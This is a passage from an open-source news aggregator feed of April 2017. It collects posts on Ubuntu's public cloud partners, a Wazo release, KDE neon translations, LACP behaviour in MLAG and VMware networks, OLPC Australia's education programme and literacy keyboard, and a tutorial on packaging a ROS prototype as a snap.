Adopting an open source edge software platform benefits the entire IoT ecosystem incorporating the system integrators, hardware manufacturers, independent software vendors and end customers themselves who are deploying IoT edge solutions. The project is also collaborating with other relevant open source projects and industry alliances to further ensure consistency and interoperability across IoT. These include the Cloud Foundry Foundation, EnOcean Alliance and ULE Alliance.

The EdgeX platform will be on display at the Hannover Messe in Germany from April 24th-28th 2017. Head to the Dell Technologies booth in Hall 8, Stand C24 to see the main demo.


24 April, 2017 02:09PM

Ubuntu Insights: OpenStack public cloud, from Stockholm to Dubai and everywhere between

  • City Network joins the Ubuntu Certified Public Cloud (CPC) programme
  • First major CPC Partner in the Nordics

City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS), today joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack platform.

With dedicated and OpenStack-based City Cloud nodes in the US, Europe and Asia, City Network recently launched in Dubai. As such, they are now the first official Ubuntu Certified Public Cloud in the Middle East offering a pure OpenStack-based platform running on Ubuntu OpenStack. Dubai has recently become the co-location and data center location of choice for the Middle East, as cloud, IoT and digitization see massive uptake and market need from the public sector, enterprises and SMEs in the region.

City Network provides public, private and hybrid cloud solutions based on OpenStack from 27 data centers around the world. Through its industry specific IaaS, City Network can ensure that their customers can comply with demands originating from specific laws and regulations concerning auditing, reputability, data handling and data security such as Basel and Solvency.

City Cloud Ubuntu lovers, from Stockholm to Dubai to Tokyo, will now be able to use official Ubuntu images, always stable and with the latest OpenStack release included, to run VMs and servers on their favourite cloud provider. Users of other distros on City Cloud are also now able to move to Ubuntu, the no. 1 cloud OS, and opt in to the Ubuntu Advantage support offering, which helps leading organisations around the world to manage their Ubuntu deployments.

“The disruptions of traditional business models and the speed in digital innovations, are key drivers for the great demand in open and flexible IaaS across the globe. Therefore, I am very pleased that we are now entering the Ubuntu Certified Public Cloud program, adding yet another opportunity for our customers to run their IT-infrastructure on an open, scalable and flexible platform,” said Johan Christenson, CEO and founder of City Network.

“Canonical is passionate about bringing the best Ubuntu user experience to users of every public cloud, but is especially pleased to have an OpenStack provider such as City Cloud offering Ubuntu, the world’s most widely used guest Linux,” said Udi Nachmany, Head of Public Cloud, Canonical. “City Cloud is known for its focus on compliance, and will now bring their customers additional choice for their public infrastructure, with an official, secure, and supportable Ubuntu experience.”

Ubuntu Advantage offers enterprise-grade SLAs for business-critical workloads, access to our Landscape systems management tool, the Canonical Livepatch Service for security vulnerabilities, and much more—all available from buy.ubuntu.com.

To start using Ubuntu on the City Cloud Infrastructure please visit https://www.citycloud.com

24 April, 2017 09:04AM

hackergotchi for Wazo

Wazo


Sprint Review 17.06

Hello Wazo community! Here comes the release of Wazo 17.06!

New features in this sprint

REST API: We have added a new REST API to get call logs in JSON format, instead of the current CSV format. The CSV format was mainly chosen for compatibility; JSON makes it easier to build new web interfaces.

Technical features

Asterisk: Asterisk was updated from 14.3.0 to 14.4.0

Important bug fixes

CTI Client: In some circumstances, transfers made via the client could cause Asterisk to consume all of the machine's CPU, blocking the transfer and losing the call. Ticket reference: #6624.

Ongoing features

Call logs: We are attaching more data to the call logs, so that we can filter call logs more easily. This mainly includes filtering call logs by user, so that call logs analysis becomes less tedious. See https://api.wazo.community in section xivo-call-logs for more details.

New web interface: This web interface will only use the REST API we've been developing in the past few years, with no brittle complicated internal logic like the current web interface has: all the logic is handled by the REST APIs. This web interface will not replace the current web interface before it has all the same features, so it will take time to become the default interface. However, both web interfaces will coexist during the maturation of the new one. We'll keep you posted when the new web interface becomes usable.

Plugin management: We are currently working on a plugin management service, as well as a standard plugin definition that will be easy to write. The goal is to allow users to add features easily to Wazo and to be able to distribute their extensions to other users. This new system will be used to install features on the new administration interface.

The instructions for installing Wazo or upgrading Wazo are available in the documentation.

For more details about the aforementioned topics, please see the roadmap linked below.

See you at the next sprint review!


24 April, 2017 04:00AM by The Wazo Authors

April 23, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

The Fridge: Ubuntu Membership Board call for nominations

As you may know, Ubuntu Membership is a recognition of significant and sustained contribution to Ubuntu and the Ubuntu community. To this end, the Community Council recruits from our current member community for the valuable role of reviewing and evaluating the contributions of potential members to bring them on board or assist with having them achieve this goal.

We have seven board members whose terms are expiring, which means we need to do some restaffing of this Membership Board.

We have the following requirements for nominees:

  • be an Ubuntu member (preferably for some time)
  • be confident that you can evaluate contributions to various parts of our community
  • be committed to attending the membership meetings
  • broad insight into the Ubuntu community at large is a plus

Additionally, those sitting on membership boards should have a proven track record of activity in the community. They have shown themselves over time to be able to work well with others and display the positive aspects of the Ubuntu Code of Conduct. They should be people who can discern character and evaluate contribution quality without emotion while engaging in an interview/discussion that communicates interest, a welcoming atmosphere, and which is marked by humanity, gentleness, and kindness. Even when they must deny applications, they should do so in such a way that applicants walk away with a sense of hopefulness and a desire to return with a more complete application rather than feeling discouraged or hurt.

To nominate yourself or somebody else (please confirm they wish to accept the nomination and state that you have done so), please send a mail to the membership boards mailing list (ubuntu-membership-boards at lists.ubuntu.com). You will want to include some information about the nominee, a Launchpad profile link, and which time slot (20:00 or 22:00) the nominee will be able to participate in.

We will be accepting nominations through Friday May 26th at 12:00 UTC. At that time all nominations will be forwarded to the Community Council who will make the final decision and announcement.

Thanks in advance to you all, and for the dedication everybody has put into their roles as board members.

Originally posted to the ubuntu-news-team mailing list on Sun Apr 23 20:20:38 UTC 2017 by Michael Hall

23 April, 2017 08:30PM

Jonathan Riddell: KDE neon Translations

One of the best things about making software collaboratively is the translations. Sure, I could make a UML diagramming tool or whatever all on my own, but it’s better if I let lots of other people help out, and one of the best crowd-sourcing features of open community development is that you get translated into many popular and obscure languages, which would cost a fortune if you paid a company to do it.

When KDE was monolithic it shipped translation files in separate kde-l10n tars, so users would only have to install the tar for their language and not waste disk space on all the other languages.  This didn’t work great because it’s faffy for people to work out they need to install it, and it doesn’t help with all the other software on their system.  In Ubuntu we did something similar, where we extracted all the translations and put them into translation packages; doing it at the distro level makes more sense than at the collection-of-things-that-KDE-ships level, but it still has problems when you install updated software.  So KDE has been moving to just shipping the translations along with the individual application or library, which makes sense, and it’s not like the disk space from the unused languages is excessive.

So when KDE neon came along we had translations for KDE frameworks and KDE Plasma straight away because those are included in the tars.  But KDE Applications still made kde-l10n tars which are separate and we quietly ignored them in the hope something better would come along, which pleasingly it now has.  KDE Applications 17.04 now ships translations in the tars for stuff which uses Frameworks 5 (i.e. the stuff we care about in neon). So KDE neon User Editions now include translations for KDE Applications too.  Not only that but Harald has done his genius and turned the releaseme tool into a library so KDE neon’s builder can use it to extract the same translation files into the developer edition packages so translators can easily try out the Git master versions of apps to see what translations look missing or broken.  There’s even an x-test language which makes xxTextxx strings so app developers can use it to check if any strings are untranslated in their applications.

The old kde-l10n packages in the Ubuntu archive would have some file clashes with the in-tar translations which would often break installs in non-English languages (I got complaints about this but not too many which makes me wonder if KDE neon attracts the sort of person who just uses their computer in English).  So I’ve built dummy empty kde-l10n packages so you can now install these without clashing files.

Still plenty to do.  Docs aren’t in the Developer Edition builds, and System Settings needs some code to make a UI for installing locales and languages of the base system; currently that needs to be done by hand if it’s not done at install time (apt install language-pack-es).  But at last another important part of KDE’s software is now handled directly by KDE rather than hoping a third party will do the right thing, and trying them out is pleasingly trivial.





23 April, 2017 01:00PM

April 22, 2017

Cumulus Linux

Sharing state between host and upstream network: LACP part 3

So far in the previous articles, we’ve covered the initial objections to LACP and taken a deep dive into the effect on traffic patterns in an MLAG environment without LACP/static LAG. In this article we’ll explore how LACP differs from all other available teaming techniques, and then show how it could have solved a problem in this particular deployment.

I originally set out to write this as a single article, but to explain the nuances it quickly spiraled beyond that. So I decided to split it up into a few parts.
• Part 1: Design choices – Which NIC teaming mode to select
• Part 2: How MLAG interacts with the host
• Part 3: “Ships in the night” – Sharing state between host and upstream network

Ships in the night

An important element to consider is that LACP is the only uplink protocol supported by VMware that directly exchanges any network state information between the host and its upstream switches. An ESXi host is sort of a host, but also sort of a network switch (in so far as it forwards packets locally and makes path decisions for north/south traffic); herein lies the problem: we effectively have network devices forwarding packets between each other, but not exchanging much in the way of state. That can lead to some bad things…

Some of those ‘bad things’ include:
1. Exploding puppies
2. Traffic black-holing
3. Non-optimal traffic flow
4. Link/fabric oversubscription upstream in the network (in particular the ISL between the switches)
5. Probably other implications… but I think that’s enough for now.

This is also the reason I chose to write this post: I’ve seen many others describe LBT vs etherchannel/LACP in detail (nice articles @vcdxnz01, btw), but none that go into much detail on the implications of this particular point.

The main piece of information of interest is topology change. For example: if you remove a physical NIC from a (d)VirtualSwitch, how is the network notified of this change? If a switch loses all its uplinks or is otherwise degraded, how are the hosts notified?

The intent here is to give the host and switches sufficient information on the current topology so they can dynamically make the best path decisions, as close to the traffic source as possible.

Without LACP, the network will need to make link forwarding decisions independently based on:

1. link state (physical port up / down)
2. mac learning

It also means that if the switch or host wants to influence each other to use an alternative path, the only mechanism available is to bring the link administratively down.

How lack of topology change notification could cause problems

Consider the following scenario:
When one of the 10G VMNICs is removed from the vDS of the ESXi host (using vCenter), in some cases it takes a long time (on the order of minutes) for the traffic to switch over. This seems strange, given that MLAG should switch the traffic over in the order of seconds (usually a lot less).

What could explain this behavior? Assume the switches are configured per the network vendor’s best practice (i.e. host-facing bonds) and the VMware consultant made similar configurations/recommendations for the host config; in this case, LBT was configured.

In this scenario, host-facing LACP bonds had been set up, with LACP bypass enabled. LACP bypass is effectively a static-bond setup until the first LACP frame is received, at which point it reverts to LACP from then on. This mode is normally used to allow PXE booting and initial configuration of the host, since LACP config can only be applied once the ESXi host is licensed, added to vCenter and then to a DVS, and configured.
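On the switch side, that bypass behaviour is typically a single knob on the host-facing bond. Below is a minimal sketch in Cumulus Linux /etc/network/interfaces syntax; the names bond1 and swp1 and the clag-id value are placeholders rather than details taken from this deployment:

```text
# /etc/network/interfaces (sketch; bond1, swp1 and clag-id 1 are
# placeholder values, not taken from the deployment described here)
auto bond1
iface bond1
    bond-slaves swp1
    clag-id 1
    # Behave as a static bond until the first LACP frame is received
    bond-lacp-bypass-allow yes
```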


Figure 1a: MLAG with Static bonds, ESX with LBT.


Figure 1b: Traffic path between VM1 and VM8

The ESXi host had not been configured with LACP or IP HASH. Figure 1a shows this base topology, assuming initial MAC learning has already occurred.

With both ESXi physical NICs / uplinks in the same vSwitch, VMs (and vmkernel interfaces) could be pinned to either link, but return traffic could still be received via either physical adapter; this is the default behavior of ESXi vSwitches. Figures 1b and 1c show the traffic path between VM1 and VM8.


Figure 1c: Traffic flow from VM8 to VM1

The problem comes when the topology changes, say by removing an uplink from the vSwitch. The switches are completely oblivious to this change, as the host hasn’t messaged it in any way.


Figure 1d: The failure scenario

The packet is sent out the configured uplink1 successfully to the destination VM, but the reply could come back via NIC2, which is not part of the vSwitch, so the packet will be dropped by ESXi.

In my mind there are two ways of looking at the problem:

  1. “That’s a configuration mistake”: the host config and switches don’t match, so of course there will be a problem, change the config of either the host or the switches!
  2. Shouldn’t the host somehow message the switches that it’s no longer using this port as an uplink?

Change the config
Easy! There’s a couple of options:

  1. Fix the host-config: Add the uplink back to the vSwitch or shutdown the uplink.
  2. Fix the switch-config: Remove the dual-connected config from the ToRs (and accept the consequences of orphan ports described in Part 2).

Message the topology change
This can be achieved in a couple of ways:

  • Manually shut down the physical uplink, so switch2 no longer uses that path.
  • Enable LACP and let the LACP driver take care of it (let’s explore that a little further)

How LACP enables topology exchange
The LACP driver on the switches and the driver on the ESXi host exchange information and status using LACP “Data Unit” (LACP-DU) frames.

The important part is that the other end of an LACP link is able to make forwarding decisions based on the information it receives in the LACP-DU. This provides a mechanism for an endpoint to message a change in link state and have the other side do what’s appropriate.

If a DU is not received, or an incorrect/unexpected DU is received, the link will normally be removed from the bond and it will immediately stop forwarding via that link. Let’s explore that in this particular scenario.


Figure 2a

In figure 2a (above), both ports are members of the same uplink group and LACP-DUs flow to/from both ToR switches.


Figure 2b

Then a topology change happens at the host, which is described in figure 2b.

  1. Vmnic2 is removed from the LACP uplink group at the host “ESX1”
  2. Switch2 fails to receive a DU within the timeout window, the port is forced “proto-down”
  3. Switch2 MLAG daemon messages the topology change to Switch1.
  4. Switch2 MLAG daemon programs the MACs associated with ESX1 onto the peerlink.

ESX1 is now treated as a singly connected host, vmnic2 is not used. Figure 2c shows the traffic flow in the forward direction.


Figure 2c


Figure 2d

Figure 2d shows the reverse traffic flow. Note that it will correctly use the peerlink.

Other scenarios
It should hopefully go without saying, but having a message protocol to advertise changes goes both ways: the network can also inform the host of any changes upstream.

For example, in the case of an MLAG daemon failure, or a split-brain scenario, you would not want the hosts forwarding assuming both links are active and working as normal. LACP allows the switches to advertise such a scenario, without necessarily having to tear down one of the local links itself (which each individual switch could easily get wrong).


Figure 3a

In a true split-brain scenario, one valid approach is to treat the two switches as independent again. Remember, an LACP bond can only form across links advertising the same system ID; different system IDs let the host know it is wired to two separate switches. The host LACP driver can then decide which of the links to disable. This is the ideal outcome because, in a true split brain, each switch may not be fully aware of whether its peer is up and forwarding. Having the host make the decision effectively adds a witness to the scenario to break the tie.
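A host-side tiebreak of this kind can be sketched as follows (an illustrative model only; the function name and the lowest-ID selection rule are assumptions for the sketch, not how any particular bonding driver chooses):

```python
# Sketch of the host-side tiebreak: an LACP bond may only include
# links whose partners advertise the same system ID. If the switches
# split-brain and revert to distinct IDs, the host groups its links by
# partner ID and keeps just one group (here: the lowest ID, purely as
# a deterministic example).

from collections import defaultdict

def select_active_links(links):
    """links: dict of interface name -> partner system ID."""
    groups = defaultdict(list)
    for ifname, system_id in links.items():
        groups[system_id].append(ifname)
    chosen = min(groups)             # deterministic tiebreaker
    return sorted(groups[chosen])

# Normal MLAG: both switches share ID 111111 -> both links stay active.
print(select_active_links({"vmnic1": "111111", "vmnic2": "111111"}))
# Split brain: switches revert to separate IDs -> one link is disabled.
print(select_active_links({"vmnic1": "111111", "vmnic2": "222222"}))
```

The first call returns both links; the second returns only one, matching the behaviour described above where the host drops the link whose partner changed its system ID.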



Figure 3b

According to the LACP spec (and our testing of several host bonding drivers confirms this), when a host receives an LACP-DU with a new system ID (222222), while the other link(s) are still up with the shared system ID (111111), the link with the changed system ID will be removed from the bundle and brought down. This is what would happen during a peerlink failure as shown above.

Wrapping up
OK, well, that was more of a novel than I originally planned to write. Hopefully I’ve done a little to bridge the gap between host networking and its implications for the upstream network.

The summary I’d like to present is this: in a fundamentally Active-Active network fabric, an Active-Active host connectivity option with a standard state-exchange mechanism is the way to go.

Of course, another option would be to do away with L2 altogether and run a routing protocol on the host itself… but that is an entirely different story for another day!

The post Sharing state between host and upstream network: LACP part 3 appeared first on Cumulus Networks Blog.

22 April, 2017 05:00PM by Doug Youd


Sridhar Dhanapalan: Creating an Education Programme

OLPC Australia had a strong presence at linux.conf.au 2012 in Ballarat, two weeks ago.

I gave a talk in the main keynote room about our educational programme, in which I explained our mission and how we intend to achieve it.

Even if you saw my talk at OSDC 2011, I recommend that you watch this one. It is much improved and contains new and updated material. The YouTube version is above, but a higher quality version is available for download from Linux Australia.

The references for this talk are on our development wiki.

Here’s a better version of the video I played near the beginning of my talk:

I should start by pointing out that OLPC is by no means a niche or minor project. XO laptops are in the hands of 8000 children in Australia, across 130 remote communities. Around the world, over 2.5 million children, across nearly 50 countries, have an XO.

Investment in our Children’s Future

The key point of my talk is that OLPC Australia have a comprehensive education programme that highly values teacher empowerment and community engagement.

The investment to provide a connected learning device to every one of the 300 000 children in remote Australia is less than 0.1% of the annual education and connectivity budgets.

For low socio-economic status schools, the cost is only $80 AUD per child. Sponsorships, primarily from corporates, allow us to subsidise most of the expense (you too can donate to make a difference). Also keep in mind that this is a total cost of ownership, covering the essentials like teacher training, support and spare parts, as well as the XO and charging rack.

While our principal focus is on remote, low socio-economic status schools, our programme is available to any school in Australia. Yes, that means schools in the cities as well. The investment for non-subsidised schools to join the same programme is only $380 AUD per child.

Comprehensive Education Programme

We have a responsibility to invest in our children’s education — it is not just another market. As a not-for-profit, we have the freedom and the desire to make this happen. We have no interest in vendor lock-in; building sustainability is an essential part of our mission. We have no incentive to build a dependency on us, and every incentive to ensure that schools and communities can help themselves and each other.

We only provide XOs to teachers who have been sufficiently enabled. Their training prepares them to constructively use XOs in their lessons, and is formally recognised as part of their professional development. Beyond the minimum 15-hour XO-certified course, a teacher may choose to undergo a further 5-10 hours to earn XO-expert status. This prepares them to be able to train other teachers, using OLPC Australia resources. Again, we are reducing dependency on us.

OLPC Australia certifications

Training is conducted online, after the teacher signs up to our programme and receives their XO. This scales well, letting us effectively train many teachers spread across the country. Participants in our programme are encouraged to join our online community to share resources and assist one another.

OLPC Australia online training process

We also want to recognise and encourage children who have shown enthusiasm and aptitude, with our XO-champion and XO-mechanic certifications. Not only does this promote sustainability in the school and give invaluable skills to the child, it reinforces our core principle of Child Ownership. Teacher aides, parents, elders and other non-teacher adults have the XO-basics (formerly known as XO-local) course designed for them. We want the child’s learning experience to extend to the home environment and beyond, and not be constrained by the walls of the classroom.

There’s a reason why I’m wearing a t-shirt that says “No, I won’t fix your computer.” We’re on a mission to develop a programme that is self-sustaining. We’ve set high goals for ourselves, and we are determined to meet them. We won’t get there overnight, but we’re well on our way. Sustainability is about respect. We are taking the time to show them the ropes, helping them to own it, and developing our technology to make it easy. We fundamentally disagree with the attitude that ordinary people are not capable enough to take control of their own futures. Vendor lock-in is completely contradictory to our mission. Our schools are not just consumers; they are producers too.

As explained by Jonathan Nalder (a highly recommended read!), there are two primary notions guiding our programme. The first is that the nominal $80 investment per child is just enough for a school to take the programme seriously and make them a stakeholder, greatly improving the chances for success. The second is that this is a schools-centric programme, driven from grassroots demand rather than being a regime imposed from above. Schools that participate genuinely want the programme to succeed.

OLPC Australia programme cycle

Technology as an Enabler

Enabling this educational programme is the clever development and use of technology. That’s where I (as Engineering Manager at OLPC Australia) come in. For technology to be truly intrinsic to education, there must be no specialist expertise required. Teachers aren’t IT professionals, and nor should they be expected to be. In short, we are using computers to teach, not teaching computers.

The key principles of the Engineering Department are:

  • Technology is an integral and seamless part of the learning experience – the pen and paper of the 21st century.
  • Dependence on technical expertise is eliminated through the development and deployment of sustainable technologies.
  • Children are empowered to be content producers and collaborators, not just content consumers.
  • An open platform allows learning from mistakes… and easy recovery.

OLPC have done a marvellous job in their design of the XO laptop, giving us a fantastic platform to build upon. I think that our engineering projects in Australia have been quite innovative in helping to cover the ‘last mile’ to the school. One thing I’m especially proud of is our insistence on openness. We turn traditional systems administration practice on its head to completely empower the end-user. Technology that is deployed in corporate or educational settings is typically locked down to make administration and support easier. This takes control completely away from the end-user. They are severely limited in what they can do, and if something doesn’t work as they expect then they are totally at the mercy of the admins to fix it.

In an educational setting this is disastrous — it severely limits what our children can learn. We learn most from our mistakes, so let’s provide an environment in which children are able to safely make mistakes and recover from them. The software is quite resistant to failure, both at the technical level (being based on Fedora Linux) and at the user interface level (Sugar). If all goes wrong, reinstalling the operating system and restoring a journal (Sugar user files) backup is a trivial endeavour. The XO hardware is also renowned for its ruggedness and repairability. Less well-known are the amazing diagnostics tools, providing quick and easy indication that a component should be repaired/replaced. We provide a completely unlocked environment, with full access to the root user and the firmware. Some may call that dangerous, but I call that empowerment. If a child starts hacking on an XO, we want to hire that kid 🙂


My talk features the case study of Doomadgee State School, in far-north Queensland. Doomadgee have very enthusiastically taken on board the OLPC Australia programme. Every one of the 350 children aged 4-14 has been issued with an XO, as part of a comprehensive professional development and support programme. Since commencing in late 2010, the percentage of Year 3 pupils at or above national minimum standards in numeracy has leapt from 31% in 2010 to 95% in 2011. Other scores have also increased. Think what you may about NAPLAN, but nevertheless that is a staggering improvement.

In federal parliament, Robert Oakeshott MP has been very supportive of our mission:

Most importantly of all, quite simply, One Laptop per Child Australia delivers results in learning from the 5,000 students already engaged, showing impressive improvements in closing the gap generally and lifting access and participation rates in particular.

We are also engaged in longitudinal research, working closely with respected researchers to have a comprehensive evaluation of our programme. We will release more information on this as the evaluation process matures.

Join our mission

Schools can register their interest in our programme on our Education site.

Our Prospectus provides a high-level overview.

For a detailed analysis, see our Policy Document.

If you would like to get involved in our technical development, visit our development site.


Many thanks to Tracy Richardson (Education Manager) for some of the information and graphics used in this article.

22 April, 2017 12:28PM

Sridhar Dhanapalan: Interview with Australian Council for Computers in Education Learning Network

Adam Holt and I were interviewed last night by the Australian Council for Computers in Education Learning Network about our not-for-profit work to improve educational opportunities for children in the developing world.

We talked about One Laptop per Child, OLPC Australia and Sugar Labs. We discussed the challenges of providing education in the developing world, and how that compares with the developed world.

Australia poses some of its own challenges. As a country that is 90% urbanised, the remaining 10% are scattered across vast distances. The circumstances of these communities often share both developed and developing world characteristics. We developed the One Education programme to accommodate this.

These lessons have been developed further into Unleash Kids, an initiative that we are currently working on to support the community of volunteers worldwide and take the movement to the next level.

22 April, 2017 12:14PM

Sridhar Dhanapalan: A Complete Literacy Experience For Young Children

From the “I should have posted this months ago” vault…

When I led technology development at One Laptop per Child Australia, I maintained two golden rules:

  1. everything that we release must ‘just work’ from the perspective of the user (usually a child or teacher), and
  2. no special technical expertise should ever be required to set-up, use or maintain the technology.

In large part, I believe that we were successful.

Once the more obvious challenges have been identified and cleared, some more fundamental problems become evident. Our goal was to improve educational opportunities for children as young as possible, but proficiently using computers to input information can require a degree of literacy.

Sugar Labs have done stellar work in questioning the relevance of the desktop metaphor for education, and in coming up with a more suitable alternative. This proved to be a remarkable platform for developing a touch-screen laptop, in the form of the XO-4 Touch: the icons-based user interface meant that we could add touch capabilities with relatively few user-visible tweaks. The screen can be swivelled and closed over the keyboard as with previous models, meaning that this new version can be easily converted into a pure tablet at will.

Revisiting Our Assumptions

Still, a fundamental assumption has long gone unchallenged on all computers: the default typeface and keyboard. It doesn’t at all represent how young children learn the English alphabet or literacy. Moreover, at OLPC Australia we were often dealing with children who were behind on learning outcomes, and who were attending school with almost no exposure to English (since they speak other languages at home). How are they supposed to learn the curriculum when they can barely communicate in the classroom?

Looking at a standard PC keyboard, you’ll see that the keys are printed with upper-case letters. And yet, that is not how letters are taught in Australian schools. Imagine that you’re a child who still hasn’t grasped his/her ABCs. You see a keyboard full of unfamiliar symbols. You press one, and on the screen pops up a completely different looking letter! The keyboard may be in upper-case, but by default you’ll get the lower-case variants on the screen.

A standard PC keyboard

Unfortunately, the most prevalent touch-screen keyboard on the market isn’t any better. Given the large education market for its parent company, I’m astounded that this has not been a priority.

The Apple iOS keyboard

Better alternatives exist on other platforms, but I still was not satisfied.

A Re-Think

The solution required an examination of how children learn, and the challenges that they often face when doing so. The end result is simple, yet effective.

The standard OLPC XO mechanical keyboard (above) versus the OLPC Australia Literacy keyboard (below)

This image contrasts the standard OLPC mechanical keyboard with the OLPC Australia Literacy keyboard that we developed. Getting there required several considerations:

  1. a new typeface, optimised for literacy
  2. a cleaner design, omitting characters that are not common in English (they can still be entered with the AltGr key)
  3. an emphasis on lower-case
  4. upper-case letters printed on the same keys, with the Shift arrow angled to indicate the relationship
  5. better use of symbols to aid instruction

One interesting user story with the old keyboard that I came across was in a remote Australian school, where Aboriginal children were trying to play the Maze activity by pressing the opposite arrows to the ones they were supposed to. Apparently they thought that the arrows represented birds’ feet! You’ll see that we changed the arrow heads on the literacy keyboard as a result.

We explicitly chose not to change the QWERTY layout. That’s a different debate for another time.

The Typeface

The abc123 typeface is largely the result of work I did with John Greatorex. It is freely downloadable (in TrueType and FontForge formats) and open source.

After much research and discussions with educators, I was unimpressed with the other literacy-oriented fonts available online. Characters like ‘a’ and ‘9’ (just to mention a couple) are not rendered in the way that children are taught to write them. Young children are also susceptible to confusion over letters that look similar, including mirror-images of letters. We worked to differentiate, for instance, the lower-case L from the upper-case i, and the lower-case p from the lower-case q.

Typography is a wonderfully complex intersection of art and science, and it would have been foolhardy for us to have started from scratch. We used as our base the high-quality DejaVu Sans typeface. This gave us a foundation that worked well on screen and in print. Importantly for us, it maintained legibility at small point sizes on the 200dpi XO display.

On the Screen

abc123 is a suitable substitute for DejaVu Sans. I have been using it as the default user interface font in Ubuntu for over a year.

It looks great in Sugar as well. The letters are crisp and easy to differentiate, even at small point sizes. We made abc123 the default font for both the user interface and in activities (applications).

The abc123 font in Sugar’s Write activity, on an XO laptop screen

Likewise, the touch-screen keyboard is clear and simple to use.

The abc123 font on the XO touch-screen keyboard, on an XO laptop screen

The end result is a more consistent literacy experience across the whole device. What you press on the hardware or touch-screen keyboard will be reproduced exactly on the screen. What you see on the user interface is also what you see on the keyboards.

22 April, 2017 07:36AM

April 21, 2017

Ubuntu Insights: ROS production: our prototype as a snap [3/5]

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the third blog post in this series about ROS production. In the previous post we came up with a simple ROS prototype. In this post we’ll package that prototype as a snap. For justifications behind why we’re doing this, please see the first post in the series.

We know from the previous post that our prototype consists of a single launch file that we wrote, contained within our prototype ROS package. Turning this into a snap is very straight-forward, so let’s get started! Remember that this is also a video series: feel free to watch the video version of this post.


This post will assume the following:

  • You’ve followed the previous posts in this series
  • You know what snaps are, and have taken the tour
  • You have a store account at http://myapps.developer.ubuntu.com
  • You have a recent Snapcraft installed (2.28 is the latest as of this writing)

Create the snap

The first step toward a new snap is to create the snapcraft.yaml. Put that in the root of the workspace we created in the previous post:

$ cd ~/workspace
$ snapcraft init
Created snap/snapcraft.yaml.
Edit the file to your liking or run `snapcraft` to get started

Do as it says, and make that file look something like this:

name: my-turtlebot-snap  # This needs to be a unique name
version: '0.1'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable
confinement: devmode

parts:
  prototype-workspace:
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

apps:
  system:
    command: roslaunch prototype prototype.launch --screen
    plugs: [network, network-bind]
    daemon: simple

Let’s digest that section by section.

name: my-turtlebot-snap
version: '0.1'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

This is the basic metadata that all snaps require. These fields are fairly self-explanatory. The only thing I want to point out specifically here is that the name must be globally unique among all snaps. If you’re following this tutorial, you might consider appending your developer name to the end of this example.

grade: stable
confinement: devmode

grade can be either stable or devel. If it’s devel, the store will prevent you from releasing into either of the two stable channels (stable and candidate, specifically); think of it as a safety net to prevent accidental releases. If it’s stable, you can release it anywhere.
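As an illustration, that gate can be sketched as a tiny check (hypothetical code, not the store’s actual implementation):

```python
# Hypothetical sketch of the release gate described above: a snap with
# grade 'devel' may not be released into the stable or candidate
# channels, while a 'stable' grade snap can go anywhere.

STABLE_CHANNELS = {"stable", "candidate"}

def can_release(grade, channel):
    if grade == "devel" and channel in STABLE_CHANNELS:
        return False
    return True

print(can_release("devel", "beta"))     # True
print(can_release("devel", "stable"))   # False
print(can_release("stable", "stable"))  # True
```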

confinement can be strict, devmode, or classic. strict enforces confinement, whereas devmode allows all accesses, even those that would be disallowed under strict confinement (and logs accesses that would otherwise be disallowed for your reference). classic is even less confined than devmode, in that it doesn’t even get private namespaces anymore (among other things). There is more extensive documentation on confinement available.

I personally always use strict confinement unless I know for sure that the thing I’m snapping won’t run successfully under confinement, in which case I’ll use devmode. I typically avoid classic unless I never intend for the app to run confined. In this case, I know from experience this snap won’t run confined as-is, and will require devmode for now (more on that later).

parts:
  prototype-workspace:
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

You learned about this in the Snapcraft tour, but I’ll cover it again real quick. Snapcraft is responsible for taking many disparate parts and orchestrating them all into one cohesive snap. You tell it the parts that make up your snap, and it takes care of the rest. Here, we tell Snapcraft that we have a single part called prototype-workspace. We specify that it builds with Catkin, and also specify that we’re using Kinetic here (as opposed to Jade, or the default, Indigo). Finally, we specify the packages in this workspace that we want included in the snap. In our case, we only have one: that prototype package we created in the previous post.

apps:
  system:
    command: roslaunch prototype prototype.launch --screen
    plugs: [network, network-bind]
    daemon: simple

This is where things get a little interesting. When we build this snap, it will include a complete ROS system: roscpp, roslib, roscore, roslaunch, your ROS workspace, etc. It’s a standalone unit: you’re in total control of how the user interacts with it. You exercise that control via the apps keyword, where you expose specific commands to the user. Here, we specify that this snap has a single app, called system. The command that this app actually runs within the snap is the roslaunch invocation we got from the previous post. We use plugs to specify that it requires network access (read more about interfaces), and finally specify that it’s a simple daemon. That means this app will begin running as soon as the snap is installed, and also run upon boot. All this, and the user doesn’t even need to know that this snap uses ROS!

That’s actually all we need to make our prototype into a snap. Let’s create the snap itself:

$ cd ~/workspace
$ snapcraft

That will take a few minutes. You’ll see Snapcraft fetch rosdep, which is then used to determine the dependencies of the ROS packages in the workspace. This is only prototype in our case, which you’ll recall from the previous post depends upon kobuki_node and kobuki_random_walker. It then pulls those down and puts them into the snap along with roscore. Finally, it builds the requested packages in the workspace, and installs them into the snap as well. At the end, you’ll have your snap.

Test the snap

Even though we’re planning on using this snap on Ubuntu Core, snaps run on classic Ubuntu as well. This is an excellent way to ensure that our snap runs as expected before moving on to Ubuntu Core. Since we already have our machine set up to communicate with the Turtlebot, we can try it out right here. The only hitch is that /dev/kobuki isn’t covered by any interface on classic Ubuntu (we can make this work for Ubuntu Core, though, more on that later). That’s why we used devmode as the confinement type in our snap. We’ll install it with devmode here:

$ sudo snap install --devmode path/to/my.snap

Right after this completes (give it a second for our app to fire up), you should hear the robot sing and begin moving. Once you remove the snap it’ll stop moving:

$ sudo snap remove my-turtlebot-snap

How easy is that? If you put that in the store, anyone with a Turtlebot (no ROS required) could snap install it and it would immediately begin moving just like it did for you. In fact, why don’t we put it in the store right now?

Put the snap in the store

Step 1: Tell Snapcraft who you are

We’re about to use Snapcraft to register and upload a snap using the store account you created when satisfying the prerequisites. For that to happen, you need to sign in with Snapcraft:

$ snapcraft login

